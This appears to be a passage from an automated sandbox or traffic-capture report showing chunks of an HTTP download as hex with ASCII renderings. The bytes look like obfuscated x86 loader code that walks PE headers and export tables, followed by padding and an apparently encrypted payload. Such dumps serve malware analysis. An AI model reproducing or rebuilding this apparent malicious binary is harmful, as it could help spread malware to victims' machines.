                                          2021-12-23 16:00:51 UTC19INData Raw: ac 00 00 00 a3 80 65 08 10 83 bc 24 94 00 00 00 00 0f 94 c0 66 8b 5c 24 3e 66 81 eb f5 02 8b 4c 24 48 83 f9 00 0f 94 c4 08 c4 66 89 9c 24 b2 00 00 00 f6 c4 01 0f 85 a8 03 00 00 e9 3f 02 00 00 8b 44 24 2c c6 00 74 8a 4c 24 2b 88 8c 24 9f 00 00 00 8b 54 24 34 89 94 24 ac 00 00 00 c6 44 24 60 75 81 c2 b5 61 0e 58 89 94 24 ac 00 00 00 c6 44 24 61 61 8a ac 24 ab 00 00 00 88 eb 80 c3 82 c6 44 24 62 6c 88 5c 24 63 80 f5 d0 c6 44 24 64 6c c6 44 24 65 6c 88 6c 24 66 c6 44 24 67 63 c6 84 24 9f 00 00 00 3c c6 44 24 68 00 66 c7 84 24 b2 00 00 00 54 aa 80 f1 9a 88 8c 24 9f 00 00 00 c6 44 24 69 a0 e8 f3 14 00 00 8b 54 24 44 89 94 24 a4 00 00 00 8b 74 24 24 89 b4 24 a0 00 00 00 89 04 24 8b 44 24 38 89 44 24 04 e8 0d 23 00 00 89 84 24 84 00 00 00 8b 84 24 84 00 00 00 66
                                          Data Ascii: e$f\$>fL$Hf$?D$,tL$+$T$4$D$`uaX$D$aa$D$bl\$cD$dlD$ell$fD$gc$<D$hf$T$D$iT$D$t$$$$D$8D$#$$f
                                          2021-12-23 16:00:51 UTC20INData Raw: 00 00 89 4c 24 74 8b 4c 24 6c 66 8b 54 24 2a 66 89 54 24 72 66 89 d6 8b 7c 24 74 89 0f 81 c6 36 8b ff ff 66 89 f3 8b 4c 24 5c 66 89 5c 24 72 8b 49 50 8b 74 24 24 81 ce 15 42 64 5f 8b 7c 24 20 89 7c 24 64 89 74 24 60 8d b4 24 c4 00 00 00 89 74 24 68 8b 74 24 68 89 0e 8b 4c 24 24 81 f1 83 0c d6 2c 89 7c 24 64 89 4c 24 60 8b 0d 64 65 08 10 89 8c 24 e8 00 00 00 8b 0d 68 65 08 10 c7 44 24 64 ff ff ff ff c7 44 24 60 45 72 5c 9a 89 8c 24 ec 00 00 00 8b 0d 6c 65 08 10 89 8c 24 f0 00 00 00 8b 0d 70 65 08 10 89 8c 24 8c 00 00 00 8b 0d 74 65 08 10 89 8c 24 b0 00 00 00 66 81 c2 c9 7b 66 89 54 24 72 89 04 24 8b 44 24 1c 89 44 24 04 e8 5e f8 ff ff 8a 44 24 33 2c 04 88 44 24 71 8b 0d 80 65 08 10 c7 44 24 44 00 00 00 00 83 f9 00 0f 84 59 01 00 00 e9 87 00 00 00 8b 44 24
                                          Data Ascii: L$tL$lfT$*fT$rf|$t6fL$\f\$rIPt$$Bd_|$ |$dt$`$t$ht$hL$$,|$dL$`de$heD$dD$`Er\$le$pe$te$f{fT$r$D$D$^D$3,D$qeD$DYD$
                                          2021-12-23 16:00:51 UTC21INData Raw: 74 24 44 89 74 24 04 89 4c 24 08 e8 0b fd ff ff 8b 44 24 50 83 f0 ff 89 44 24 50 e9 53 ff ff ff cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 57 53 83 e4 f8 83 ec 78 8b 45 08 8a 4c 24 67 c7 44 24 60 3d 13 65 36 89 44 24 24 88 4c 24 23 e8 b8 20 00 00 31 d2 b1 4e be 8d 58 65 36 c7 44 24 5c e8 3b de 5c 89 c7 8b 58 3c 89 44 24 1c 89 f8 01 d8 89 44 24 18 89 d8 0d ec c6 9b 4c 89 44 24 5c 66 8b 44 24 5a 66 89 44 24 16 66 25 0c fa 2b 74 24 60 88 4c 24 15 8b 4c 24 1c 8b 1c 19 66 89 44 24 5a 66 8b 44 24 16 66 35 ba c5 8b 4c 24 18 66 89 44 24 5a 8a 44 24 15 8a 64 24 23 28 e0 39 f3 0f 44 d1 8b 4a 78 88 44 24 67 89 fa 01 ca 8b 74 24 1c 8b 5c 0e 20 80 f4 6f 89 fe 01 de 88 64 24 67 8b 5c 24 1c 8b 4c 0b 18 c7 44 24 4c 00 00 00 00 66 c7 44 24 5a ff fd 83 f9 00 89 7c 24 10
                                          Data Ascii: t$Dt$L$D$PD$PSUVWSxEL$gD$`=e6D$$L$# 1NXe6D$\;\X<D$D$LD$\fD$ZfD$f%+t$`L$L$fD$ZfD$f5L$fD$ZD$d$#(9DJxD$gt$\ od$g\$LD$LfD$Z|$
                                          2021-12-23 16:00:51 UTC23INData Raw: 89 84 24 94 00 00 00 c7 84 24 a4 00 00 00 00 00 00 00 c7 44 24 50 00 00 00 00 e9 c7 03 00 00 c6 84 24 ae 00 00 00 55 8b 44 24 48 8a 8c 24 ae 00 00 00 0a 8c 24 ae 00 00 00 88 8c 24 ae 00 00 00 89 84 24 98 00 00 00 e9 84 00 00 00 8b 84 24 88 00 00 00 89 44 24 40 e9 f1 fd ff ff b8 be aa 88 46 8b 4c 24 44 8b 94 24 b0 00 00 00 03 94 24 b0 00 00 00 89 94 24 b0 00 00 00 83 c1 01 66 8b b4 24 b6 00 00 00 2b 84 24 a8 00 00 00 66 69 f6 9d 34 66 89 b4 24 b6 00 00 00 89 8c 24 84 00 00 00 39 c1 0f 84 f4 02 00 00 e9 ef 00 00 00 8b 84 24 b0 00 00 00 0d 25 f2 25 01 89 84 24 b0 00 00 00 c7 84 24 84 00 00 00 00 00 00 00 e9 cc 00 00 00 0f b7 84 24 b6 00 00 00 8b 8c 24 98 00 00 00 0f af c0 66 89 c2 66 89 94 24 b6 00 00 00 8b 84 24 94 00 00 00 8a 1c 08 80 c3 e0 88 1c 08 83 c1
                                          Data Ascii: $$D$P$UD$H$$$$$D$@FL$D$$$f$+$fi4f$$9$%%$$$$ff$$
                                          2021-12-23 16:00:51 UTC24INData Raw: c2 c8 02 e9 51 c3 ff ff 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 83 c2 04 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 53 57 83 e4 f8 81 ec e8 00 00 00 8d 84 24 84 00 00 00 8d 4c 24 23 66 c7 84 24 d4 00 00 00 55 0f 8b 94 24 cc 00 00 00 89 d6 09 f6 89 b4 24 cc 00 00 00 c6 84 24 cb 00 00 00 0e 66 c7 84 24 d2 00 00 00 d6 ee c7 84 24 c4 00 00 00 d0 0c 44 4a 66 c7 44 24 66 6d c7 8a 9c 24 d7 00 00 00 66 8b 7c 24 66 88 9c 24 d7 00 00 00 c6 44 24 23 6b 66 81 ff 45 68 66 89 7c 24 20 89 4c 24 1c 89 54 24 18 88 5c 24 17 89 44 24 10 74 4c e9 60 02 00 00 64 8b 0d 18 00 00 00 31 c0 81 f9 00 10 00 00 0f 42 c8 8b
                                          Data Ascii: QUVSW$L$#f$U$$$f$$DJfD$fm$f|$f$D$#kfEhf|$ L$T$\$D$tL`d1B
                                          2021-12-23 16:00:51 UTC25INData Raw: 89 d7 8b 54 24 20 8b 5c 24 24 66 89 7c 24 1e 66 81 fe 93 24 89 44 24 18 89 54 24 14 89 5c 24 10 72 14 8b 44 24 18 8a 08 80 c1 01 0f be c1 8d 65 f4 5e 5f 5b 5d c3 31 c0 c7 04 24 00 00 00 00 89 44 24 0c e8 d8 ef ff ff b1 8d 0f be d1 89 44 24 08 89 d0 8d 65 f4 5e 5f 5b 5d c3 cc cc cc cc cc 55 89 e5 56 53 57 83 e4 f8 83 ec 78 8b 45 08 66 c7 44 24 6e 26 73 66 8b 4c 24 6c 66 c7 44 24 6c f2 e5 c7 44 24 58 96 80 a7 6e 8b 54 24 70 83 f8 00 89 44 24 18 66 89 4c 24 16 89 54 24 10 0f 84 86 00 00 00 e9 3f 02 00 00 8b 44 24 24 89 44 24 54 e9 ed 01 00 00 8b 44 24 3c 8b 4c 24 10 69 d1 ea a6 8b 72 89 54 24 70 8b 00 89 44 24 40 8b 44 24 30 8b 54 24 60 8b 74 24 64 89 d7 0f af fe 89 44 24 0c 89 d0 f7 e2 01 fa 01 fa 66 8b 5c 24 6e 66 be 27 73 66 29 de 89 54 24 64 89 44 24 60
                                          Data Ascii: T$ \$$f|$f$D$T$\$rD$e^_[]1$D$D$e^_[]UVSWxEfD$n&sfL$lfD$lD$XnT$pD$fL$T$?D$$D$TD$<L$irT$pD$@D$0T$`t$dD$f\$nf'sf)T$dD$`
                                          2021-12-23 16:00:51 UTC27INData Raw: 8b 4c 24 30 81 e1 a4 c4 91 03 89 4c 24 50 8b 48 10 8b 54 24 30 81 f2 0d c8 56 47 8b 70 28 89 54 24 50 8b 54 24 3c 39 d1 0f 94 c3 8a 7c 24 1f 20 df f6 c7 01 89 44 24 28 89 4c 24 10 89 74 24 04 0f 85 bf fe ff ff e9 17 ff ff ff 8b 44 24 24 66 8b 4c 24 4e 66 33 4c 24 4e 8b 54 24 04 66 8b 34 42 66 89 4c 24 4e 66 89 f1 66 83 c1 bf 66 89 f7 66 83 c7 20 66 8b 5c 24 4e 66 33 5c 24 4e 66 89 5c 24 4e 66 83 f9 1a 66 0f 42 f7 66 8b 4c 24 4e 66 83 f1 ff 66 89 4c 24 4e 8b 54 24 34 66 39 34 42 0f 94 c1 66 83 fe 00 0f 95 c5 88 ca 20 ea 8a 6c 24 3b 88 6c 24 4d 83 c0 01 8b 74 24 0c 39 f0 0f 92 c6 c6 44 24 4d 77 20 f2 f6 c2 01 88 4c 24 17 89 44 24 24 0f 85 70 ff ff ff e9 69 fe ff ff 31 c0 8b 4c 24 28 8b 11 8b 74 24 08 39 f2 89 44 24 2c 89 54 24 18 0f 84 ea fe ff ff e9 fb fe
                                          Data Ascii: L$0L$PHT$0VGp(T$PT$<9|$ D$(L$t$D$$fL$Nf3L$NT$f4BfL$Nffff f\$Nf3\$Nf\$NffBfL$NffL$NT$4f94Bf l$;l$Mt$9D$Mw L$D$$pi1L$(t$9D$,T$
                                          2021-12-23 16:00:51 UTC28INData Raw: 00 00 8b 84 24 bc 00 00 00 89 84 24 90 00 00 00 66 8b 4c 24 40 66 89 c8 01 c0 66 89 c2 66 89 94 24 c8 00 00 00 8b 84 24 b8 00 00 00 89 44 24 54 8a 5c 24 43 88 9c 24 cb 00 00 00 8b 84 24 c0 00 00 00 8b b4 24 c4 00 00 00 8b bc 24 90 00 00 00 31 db b9 7d 63 98 57 29 c1 19 f3 89 8c 24 c0 00 00 00 89 9c 24 c4 00 00 00 8b 44 24 24 8b 0c b8 8b 74 24 30 01 ce 89 b4 24 98 00 00 00 8b 8c 24 c4 00 00 00 8b 84 24 c0 00 00 00 be a3 cb 6c 30 f7 e6 69 c9 a3 cb 6c 30 01 ca 89 84 24 c0 00 00 00 89 94 24 c4 00 00 00 c7 84 24 8c 00 00 00 00 00 00 00 e9 c6 02 00 00 8d 84 24 a4 00 00 00 31 c9 8d 54 24 60 8b 74 24 2c 89 b4 24 cc 00 00 00 81 ee 90 25 1a 36 89 b4 24 cc 00 00 00 c7 84 24 cc 00 00 00 bc 2a f2 78 c7 44 24 60 00 00 00 00 8b 74 24 44 89 34 24 89 44 24 04 c7 44 24 08
                                          Data Ascii: $$fL$@fff$$D$T\$C$$$$1}cW)$$D$$t$0$$$l0il0$$$$1T$`t$,$%6$$*xD$`t$D4$D$D$
                                          2021-12-23 16:00:51 UTC29INData Raw: f0 ff ff 66 89 54 24 2e 89 4c 24 18 66 8b 54 24 02 66 81 f2 52 b2 66 89 54 24 2e 3d b1 ee 1d 76 77 19 eb 17 8d 05 70 6f 00 10 89 44 24 0c 8a 4c 24 01 80 c9 ba 88 4c 24 37 eb 22 b8 76 51 24 09 2b 44 24 30 8b 4c 24 18 8b 54 24 04 89 54 24 1c 21 c1 66 c7 44 24 2e 6f 7f 89 4c 24 0c 8b 44 24 0c 89 44 24 14 8a 4c 24 01 80 f1 ff 8b 44 24 14 88 4c 24 37 66 8b 10 8b 44 24 04 69 f0 68 76 15 30 89 74 24 1c 05 83 ae bb 14 89 44 24 1c 66 81 fa 4d 5a 0f 85 38 ff ff ff 8b 44 24 04 05 c1 70 c6 71 8b 4c 24 14 89 44 24 1c 8b 44 24 14 8b 49 3c 8b 54 24 04 89 54 24 1c 8b 04 08 8a 5c 24 01 80 f3 3b 88 5c 24 37 66 8b 74 24 02 66 81 e6 6c fe 66 89 74 24 2e 3d 50 45 00 00 0f 84 e5 fe ff ff e9 eb fe ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 55 89 e5 53 56 57 83 e4 f8 81
                                          Data Ascii: fT$.L$fT$fRfT$.=vwpoD$L$L$7"vQ$+D$0L$T$T$!fD$.oL$D$D$L$D$L$7fD$ihv0t$D$fMZ8D$pqL$D$D$I<T$T$\$;\$7ft$flft$.=PEUSVW
                                          2021-12-23 16:00:51 UTC31INData Raw: 6e 89 8c 24 e0 00 00 00 8b 4c 24 3c 89 8c 24 e4 00 00 00 66 8b 94 24 de 00 00 00 66 8b 7c 24 2c 66 89 fe 89 f3 01 db 66 89 df 66 89 bc 24 ee 00 00 00 66 bf 72 4d 66 29 d7 8b 5c 24 40 81 c3 53 4b e7 40 83 d1 00 89 9c 24 e0 00 00 00 89 8c 24 e4 00 00 00 8b 48 28 81 ce 49 ec 00 00 66 89 f2 66 89 94 24 ee 00 00 00 89 8c 24 c4 00 00 00 8b 4c 24 40 81 c9 b5 0b f8 57 8b 74 24 3c 89 b4 24 e4 00 00 00 89 8c 24 e0 00 00 00 8b 40 10 89 84 24 d0 00 00 00 8b 44 24 48 01 c0 8b 8c 24 cc 00 00 00 89 84 24 f0 00 00 00 66 8b 51 24 8b 44 24 48 0d 5c 10 e1 68 89 84 24 f0 00 00 00 66 89 f9 66 d3 ea 0f b7 c2 89 84 24 d8 00 00 00 66 83 fa 00 0f 84 08 fe ff ff c7 44 24 6c 00 00 00 00 66 b8 60 e3 8d 4c 24 7c 8b 54 24 6c 89 94 24 bc 00 00 00 66 8b 74 24 2c 66 89 b4 24 ee 00 00 00
                                          Data Ascii: n$L$<$f$f|$,fff$frMf)\$@SK@$$H(Iff$$L$@Wt$<$$@$D$H$$fQ$D$H\h$ff$fD$lf`L$|T$l$ft$,f$
                                          2021-12-23 16:00:51 UTC32INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC33INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 12 08 00 3a
                                          Data Ascii: ,:
                                          2021-12-23 16:00:51 UTC34INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC36INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2021-12-23 16:00:51 UTC37INData Raw: 0a c8 0c 45 ec 31 e9 22 e0 9c 3d b7 ca 17 9d ab 43 d8 03 e1 94 6d 61 44 e1 03 4e 27 d0 a9 24 72 8a 47 d9 79 ec 65 b5 42 5f fc 5d 84 ca 4b bd ab c3 ec 4f f5 34 4e 2e 90 2d 63 ee a8 30 95 24 5e 09 14 ed 78 cc e5 b5 c2 e0 1c 5c 38 aa 17 9d 2b 42 0b 63 15 94 ee 61 c3 61 83 4e f4 30 c8 25 12 d6 48 8d 79 cc 31 c9 41 40 e8 dd b8 aa 17 bc f7 23 ec 83 f5 34 4e 42 c3 41 63 6d a8 30 c8 24 91 d6 47 8d 45 b8 31 b5 41 60 fc dd 98 ca 4a 89 2a 0f 0b 4f 14 94 3a 61 c3 60 03 3a 08 30 a9 a5 12 0a 47 d9 f9 b8 64 69 0e 40 e8 3d b8 aa 4b bc f7 c3 d8 63 15 80 ee e2 90 e1 63 ee f4 4f c8 f1 12 ea c8 8d 79 6c 31 69 c2 40 fc dd b8 96 4b bc 0b 43 0c 03 95 b4 6e 62 44 41 83 6e 27 4f 95 24 72 09 48 d9 45 b8 64 e8 42 60 1b 29 98 c9 17 bd 2a 23 0c 03 95 94 6d e2 a4 2d 82 6d 27 50 c9 f1
                                          Data Ascii: E1"=CmaDN'$rGyeB_]KO4N.-c0$^x\8+BcaaN0%Hy1A@#4NBAcm0$GE1A`J*O:a`:0Gdi@=KccOyl1i@KCnbDAn'O$rHEdB`)*#m-m'P
                                          2021-12-23 16:00:51 UTC38INData Raw: 82 4e 28 4f 95 f1 91 0a c8 d9 45 b8 64 e9 0e e0 fc 5d b7 96 4a bc f7 43 0c 03 14 94 ee e2 c4 2d 03 4e 27 d0 c8 a5 72 ea 28 ed 59 cc 64 b5 22 2c e8 dd 84 c9 4a 3d 2b 23 8c 4f 14 80 6e 62 c3 41 82 4e 28 4f 49 24 92 09 47 0d 59 ec e5 b5 41 e0 e8 5c 84 aa 2b 3d ab 0f d8 82 e1 b4 6e 2e 90 2d 83 4e a8 4f 49 05 92 d6 48 ed 45 cc e5 b5 41 e0 e8 5d b8 4a 2b bd ab 42 ec 03 e1 80 3a 2e 90 2d 4f ee 28 d0 95 25 72 d6 c8 8d 45 cc 31 b5 c2 e0 fc 5c 84 ca 4a 9d 2a c3 d8 4f e1 b4 6d 2e c3 e1 03 4e 08 d0 49 05 92 ea 28 0c 59 eb 45 b5 42 5f 1c dd b8 ca 17 bc f7 42 ec 03 e1 80 4e 2e 90 61 03 3a 27 1c c8 24 91 8a 48 8d 59 ec 65 e9 0e 2c 9c 3d 84 ca 2b bc 2b c3 0b 83 14 94 4e 42 90 60 03 6e f4 1c c8 05 91 09 14 0c 45 eb 31 e9 22 2c e8 29 38 96 2b 9d 2a 23 ec 82 95 b3 6e 61 c3
                                          Data Ascii: N(OEd]JC-N'r(Yd",J=+#OnbAN(OI$GYA\+=n.-NOIHEA]J+B:.-O(%rE1\J*Om.NI(YEB_BN.a:'$HYe,=++NB`nE1",)8+*#na
                                          2021-12-23 16:00:51 UTC40INData Raw: 63 95 34 6e e2 a4 61 4f 4e f4 30 c8 24 12 d6 48 0c f9 cc e5 69 c2 60 9c dd 84 ca 4b 3d 2b 0f 0c 83 15 94 6d 61 90 61 83 3a 27 1c a9 24 92 8a c8 ed 79 6c 31 e9 42 2c 1b 3d 84 4a 2b bc ab 42 0c 03 14 b4 4e 2e c3 60 4f ee 27 30 49 24 72 8a c8 d9 45 b8 45 e9 42 2c 1b 5d 98 ca 4a 89 ab 23 0b 4f 15 b4 ee e2 44 41 4f ee 27 d0 c9 25 5e 09 14 ed 79 6c e5 e8 42 e0 fc 5c 98 4a 17 bc 2a 23 ec 83 14 94 4e 62 c3 2d 63 6d 08 50 a9 f1 92 8a c8 0d 45 b8 65 b5 c2 40 9c 5c 98 aa cb 3d f7 0f 8c 83 f5 80 3a 62 c3 e1 82 6d 08 1c 49 24 91 8a 47 0d f9 cc 31 69 0e e0 e8 29 b8 96 4b 89 2b c3 ec 83 f5 b4 ee e2 a4 61 63 6d 27 1c c9 a5 91 ea 28 0c 78 6c e5 b5 42 40 fc 29 38 96 4a 3d ab 0f d8 03 14 94 6e 62 90 2d 83 6e 27 50 c8 25 12 8a 28 0c 78 cc e5 e9 22 40 fc 5d 38 4a 4b bd ab 0f
                                          Data Ascii: c4naON0$Hi`K=+maa:'$yl1B,=J+BN.`O'0I$rEEB,]J#ODAO'%^ylB\J*#Nb-cmPEe@\=:bmI$G1i)K+acm'(xlB@)8J=nb-n'P%(x"@]8JK
                                          2021-12-23 16:00:51 UTC41INData Raw: 38 ca 4a bd f7 0f 0c 4f 15 b4 4e 2e 90 2d 4f 3a 08 50 c8 05 91 ea 48 0d 78 b8 65 c9 42 2c fc dd 98 ca cb 89 ab 42 0b 82 f5 34 6e 2e 90 60 82 4e 27 50 a9 a5 72 8a c8 0c 59 cc 64 c9 c2 2c e8 5d b8 aa 17 89 f7 23 8c 82 e1 34 6d 62 44 2d 4f 3a 27 d0 49 f1 72 ea 47 8d f9 cc 64 e8 22 60 e8 29 b8 aa cb bc f7 23 ec 03 15 34 6e 62 a4 e1 63 4e 08 30 c8 05 91 09 47 0d 59 b8 e5 69 41 60 e8 dd b8 c9 4b bd f7 43 0b 03 f5 80 3a e2 a4 41 82 6e 28 30 49 a5 12 0a 47 0d f9 6c e5 e9 22 5f 1b 3d 98 c9 4b 3d 2a 42 8c 63 95 b4 6d 2e 44 61 03 6d 27 30 a9 f1 72 ea 47 0d 59 cc 45 e9 42 5f 1c 5c 38 4a cb bd 2a 0f 0c 82 15 b3 3a e2 a4 41 03 ee 27 50 95 24 91 09 28 d9 45 cc 65 e8 22 e0 9c dd 38 ca 17 bc 0b 0f d8 03 f5 b3 6d 42 90 e1 03 ee f4 d0 c9 f1 91 d6 47 0c 79 cc 31 69 c2 40 1b
                                          Data Ascii: 8JON.-O:PHxeB,B4n.`N'PrYd,]#4mbD-O:'IrGd"`)#4nbcN0GYiA`KC:An(0IGl"_=K=*Bcm.Dam'0rGYEB_\8J*:A'P$(Ee"8mBGy1i@
                                          2021-12-23 16:00:51 UTC42INData Raw: eb e5 e8 42 5f e8 5d 38 c9 4b 3d ab 0f 8c 4f e1 b3 6e e2 90 41 83 ee f4 50 a9 05 92 09 14 0c 45 eb e5 b5 22 2c fc 29 38 4a 17 bd 2a 23 d8 4f 95 b4 6e 61 90 41 63 6e 08 50 49 24 12 ea 28 8d 59 6c 65 e9 42 2c 1c 5c 98 96 4b bd 0b 42 ec 82 e1 80 4e e2 a4 e1 83 ee 28 30 95 05 92 09 c8 0d 78 ec 64 e9 22 40 e8 29 98 96 4b bd 2b 0f 0b 83 14 80 4e 62 a4 61 82 3a 28 d0 c8 05 72 d6 48 8d 79 b8 45 69 0e 40 1c 5d b7 ca cb 3d 2b 42 8c 83 e1 b4 6d 42 c3 60 82 6d 27 4f 49 05 72 09 28 ed 59 cc 45 c9 0e 40 fc 5d 98 c9 17 3d f7 43 0b 83 f5 94 6e 2e c4 e1 4f 6d 08 30 49 f1 5e 09 28 d9 78 6c e5 c9 0e 40 e8 5d b7 4a 17 bc 2a 43 8c 63 95 b4 6e 2e a4 2d 82 4e 08 4f c9 a5 5e 0a c8 8d 78 cc 31 e9 41 40 e8 29 84 c9 4b bc 2b 23 ec 03 95 34 3a 62 c3 61 4f 3a f4 d0 a9 24 91 0a 48 0d
                                          Data Ascii: B_]8K=OnAPE",)8J*#OnaAcnPI$(YleB,\KBN(0xd"@)K+Nba:(rHyEi@]=+BmB`m'OIr(YE@]=Cn.Om0I^(xl@]J*Ccn.-NO^x1A@)K+#4:baO:$H
                                          2021-12-23 16:00:51 UTC44INData Raw: c9 f1 92 0a 14 ed 45 cc 65 e9 41 5f e8 5d b8 4a 2b 3d ab 23 0c 4f e1 94 6d 61 a4 60 03 3a 08 4f 49 a5 92 09 48 8d 79 eb e5 e9 0e 40 fc 3d 84 ca 4b 3d 2b 42 0c 4f 14 34 6e 62 90 41 82 6d 28 1c a9 f1 72 0a 14 0c 79 6c e5 e8 22 40 1b 3d 84 ca 2b 3d ab 0f 0b 82 95 b3 6e 62 90 e1 03 ee 28 d0 c9 f1 72 0a 28 ed 78 b8 45 c9 42 60 fc 5d b8 ca 4a bd 2a c3 8c 83 14 94 4e 2e a4 60 63 6e f4 4f c8 a5 12 8a c8 d9 45 eb 31 e9 22 5f 1c 29 84 96 2b 9d ab 23 8c 83 14 94 4e 61 a4 e1 82 4e 08 d0 c8 a5 12 d6 c8 0c 59 6c 64 c9 c2 40 9c dd 84 aa cb 3d 0b c3 ec 63 14 b3 6d 2e c4 e1 4f 6e 08 30 95 24 92 8a c8 0d f9 b8 e5 b5 41 40 1b 00 29 b7 96 17 3d ab 42 8c 4f 15 94 6e e2 a4 61 83 3a f4 50 95 f1 91 0a 48 d9 79 b8 e5 b5 42 40 9c 5d 98 4a 17 3d 2b 42 0b 82 f5 34 4e 42 c4 41 03 4e
                                          Data Ascii: EeA_]J+=#Oma`:OIHy@=K=+BO4nbAm(ryl"@=+=nb(r(xEB`]J*N.`cnOE1"_)+#NaNYld@=cm.On0$A@)=BOna:PHyB@]J=+B4NBAN
                                          2021-12-23 16:00:51 UTC45INData Raw: 4e 61 44 2d 63 6d a8 1c a9 a5 72 0a 47 8d 59 b8 45 69 c2 e0 1b 29 b8 c9 4b 89 0b 23 8c 83 f5 b4 4e 42 90 41 83 6e f4 4f c8 f1 91 ea 28 0c 79 eb 31 69 22 60 1c 29 b8 ca 4b bd 0b 43 d8 82 f5 94 3a 61 90 e1 4f 6e 08 30 49 25 72 8a c8 d9 78 b8 45 69 0e 40 fc 5d 84 96 cb 9d 2a 42 8c 03 14 b4 6e e2 90 60 4f 6d a8 d0 a9 f1 5e 8a c8 8d 45 6c 65 b5 0e 40 e8 3d b8 4a 2b bd 2a 23 ec 82 f5 34 3a 2e c4 41 83 4e a8 1c a9 a5 91 09 48 0d 59 b8 64 b5 42 5f 9c 3d 98 ca 4a bc 0b 43 d8 83 15 34 4e 2e 44 60 82 6d a8 d0 c8 05 91 ea c8 8d 79 ec e5 e8 41 40 1b dd b8 96 4b 89 2a 43 0c 4f f5 94 ee 62 c3 60 03 4e a8 4f 49 25 5e 09 28 d9 59 eb 64 c9 42 40 e8 5d b7 96 4a 3d 2b 43 0c 83 14 80 6e 2e 44 61 4f 4e 08 d0 49 24 91 0a 28 ed 79 6c 64 e9 0e e0 fc 5c 98 aa 4b 9d f7 0f 0b 82 95
                                          Data Ascii: NaD-cmrGYEi)K#NBAnO(y1i"`)KC:aOn0I%rxEi@]*Bn`Om^Ele@=J+*#4:.ANHYdB_=JC4N.D`myA@K*COb`NOI%^(YdB@]J=+Cn.DaONI$(yld\K
